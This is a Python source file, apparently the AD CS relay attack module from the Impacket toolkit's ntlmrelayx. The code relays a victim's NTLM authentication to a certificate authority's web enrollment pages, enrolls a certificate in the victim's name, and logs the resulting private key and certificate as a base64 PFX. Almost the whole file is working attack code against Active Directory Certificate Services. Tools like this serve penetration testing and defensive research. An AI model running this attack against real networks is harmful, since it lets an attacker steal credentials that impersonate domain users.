# Impacket - Collection of Python classes for working with network protocols.
#
# SECUREAUTH LABS. Copyright (C) 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Description:
#   AD CS relay attack: relays the victim's NTLM authentication to the
#   AD CS web enrollment endpoint (/certsrv) and requests a certificate
#   for the relayed user.
#
# Authors:
#   Ex Android Dev (@ExAndroidDev)
#   Tw1sm (@Tw1sm)
16import re
17import base64
18from OpenSSL import crypto
20from impacket import LOG
# Users for whom an enrollment request has already been relayed during this
# run; consulted by ADCSAttack._run so one user is not enrolled twice.
# Deliberately a plain list (not a set) so external code that appends to or
# iterates it keeps working.
ELEVATED = list()
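class ADCSAttack:
    """HTTP attack that relays an NTLM-authenticated session to the AD CS web
    enrollment pages (``/certsrv``) and enrolls a certificate for the relayed user.

    The class has no ``__init__`` of its own; ntlmrelayx mixes it into its HTTP
    attack class, which supplies the attributes used here:

    - ``self.client``: an ``http.client``-style connection already authenticated
      as the victim (``request()`` / ``getresponse()``).
    - ``self.username``: the relayed user; used as the CSR subject CN and as the
      key of the module-level ``ELEVATED`` cache.
    - ``self.config.template``: certificate template to enroll in. It must be
      published on the CA and the relayed principal must have Enroll rights on
      it, otherwise certfnsh.asp returns no request ID.

    The result is a PKCS#12 (PFX) holding the private key and certificate,
    base64-encoded into the log; that log line is a credential and should be
    handled as such.
    """

    def _run(self):
        """Entry point invoked by the HTTP attack class after a successful relay.

        Generates a key pair and CSR, submits it, downloads the issued
        certificate and logs the resulting PFX. Failures are logged and the
        method simply returns; nothing is raised to the caller.
        """
        # Check the cache before generating a 4096-bit key: key generation is
        # the expensive part and is wasted for an already-handled user.
        if self.username in ELEVATED:
            LOG.info('Skipping user %s since attack was already performed' % self.username)
            return

        key = crypto.PKey()
        key.generate_key(crypto.TYPE_RSA, 4096)
        csr = self.generate_csr(key, self.username)
        LOG.info("CSR generated!")

        certificate_id = self._submit_csr(csr)
        if certificate_id is None:
            return

        certificate = self._fetch_certificate(certificate_id)
        if certificate is None:
            return

        certificate_store = self.generate_pfx(key, certificate)
        LOG.info("Base64 certificate of user %s: \n%s" % (self.username, base64.b64encode(certificate_store).decode()))

    def _submit_csr(self, csr):
        """POST the PEM CSR to certfnsh.asp and return the request ID (str) the
        CA assigned, or None (after logging) when no certificate was issued.

        ``csr`` is the PEM bytes returned by ``generate_csr``.
        """
        # Hand-rolled form encoding of the PEM block: strip newlines, escape the
        # literal '+' of base64 first, then turn the spaces of the BEGIN/END
        # armor into '+'. Kept verbatim because this is the form certfnsh.asp
        # is known to accept; '/' and '=' are left unescaped on purpose.
        encoded_csr = csr.decode().replace("\n", "").replace("+", "%2b").replace(" ", "+")
        data = "Mode=newreq&CertRequest=%s&CertAttrib=CertificateTemplate:%s&TargetStoreFlags=0&SaveCert=yes&ThumbPrint=" % (encoded_csr, self.config.template)
        # Encode once and size the header from the bytes, so a non-ASCII
        # template name cannot yield a Content-Length that disagrees with the body.
        body = data.encode()
        headers = {
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
            "Content-Type": "application/x-www-form-urlencoded",
            "Content-Length": str(len(body)),
        }

        LOG.info("Getting certificate...")
        self.client.request("POST", "/certsrv/certfnsh.asp", body=body, headers=headers)
        # Cached as soon as the request is on the wire (not on success), so a
        # second relay of the same user cannot submit a duplicate enrollment
        # request to the CA.
        ELEVATED.append(self.username)
        response = self.client.getresponse()
        # Always drain the body, also on error, so the connection stays reusable.
        content = response.read()

        if response.status != 200:
            LOG.error("Error getting certificate! Make sure you have entered a valid certificate template.")
            LOG.debug("certfnsh.asp returned HTTP %d" % response.status)
            return None

        found = re.findall(r'location="certnew.cer\?ReqID=(.*?)&', content.decode(errors="replace"))
        if not found:
            # Typical causes: template not published, the relayed principal
            # lacks Enroll rights, or the request was left pending approval.
            LOG.error("Error obtaining certificate!")
            return None
        return found[0]

    def _fetch_certificate(self, certificate_id):
        """GET the issued certificate for ``certificate_id`` and return it as a
        PEM str, or None (after logging) when the download is not a certificate.
        """
        # certificate_id is taken from the CA's own redirect in the previous
        # response, not from the victim, so it is used verbatim in the path.
        self.client.request("GET", "/certsrv/certnew.cer?ReqID=" + certificate_id)
        response = self.client.getresponse()
        certificate = response.read().decode(errors="replace")

        # Without this check a non-200 page or an HTML error body would only
        # surface later as an OpenSSL parse exception inside generate_pfx.
        if response.status != 200 or "-----BEGIN CERTIFICATE-----" not in certificate:
            LOG.error("Error downloading certificate with ReqID %s (HTTP %d)" % (certificate_id, response.status))
            return None

        LOG.info("GOT CERTIFICATE!")
        LOG.info("Certificate request ID: %s" % certificate_id)
        return certificate

    def generate_csr(self, key, CN):
        """Build and self-sign a PKCS#10 CSR for ``key`` with subject CN=``CN``.

        Returns the CSR as PEM bytes. Only the CN is set; the CA fills in the
        subject/SAN from the template and the authenticated requester.
        """
        LOG.info("Generating CSR...")
        req = crypto.X509Req()
        req.get_subject().CN = CN
        req.set_pubkey(key)
        req.sign(key, "sha256")

        return crypto.dump_certificate_request(crypto.FILETYPE_PEM, req)

    def generate_pfx(self, key, certificate):
        """Bundle ``key`` and the PEM ``certificate`` into PKCS#12 bytes.

        No passphrase is passed to ``export()``, so whoever can read the log
        output has the private key; protect the log accordingly.
        Raises ``OpenSSL.crypto.Error`` if ``certificate`` is not valid PEM.
        NOTE(review): ``crypto.PKCS12`` is deprecated in recent pyOpenSSL
        releases; a future version may need ``cryptography``'s PKCS#12
        serialization instead - confirm against the pinned pyOpenSSL version.
        """
        certificate = crypto.load_certificate(crypto.FILETYPE_PEM, certificate)
        p12 = crypto.PKCS12()
        p12.set_certificate(certificate)
        p12.set_privatekey(key)
        return p12.export()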